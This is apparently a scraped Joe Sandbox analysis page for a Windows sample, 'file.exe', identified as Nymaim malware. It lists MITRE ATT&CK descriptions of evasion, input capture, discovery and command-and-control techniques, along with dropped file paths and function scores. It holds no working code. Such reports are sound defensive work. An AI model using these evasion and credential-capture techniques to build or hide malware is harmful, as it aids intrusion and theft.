Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Nymaim

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)

C:\Program Files (x86)\FgasoftFR\FinalRecovery\Readme.txt (copy)

C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\Config.xml (copy)

C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\is-K2TAS.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.chm (copy)

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-05LH6.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-587OJ.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-8DPO5.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.dat

C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fuckingdllENCR[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\stuk[1].htm

Windows Analysis Report
file.exe

Function 00409B08 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Function 004051D4 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 0040A0C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
COMMON

Function 0040907C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Function 0040A0AD Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Function 0040997C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre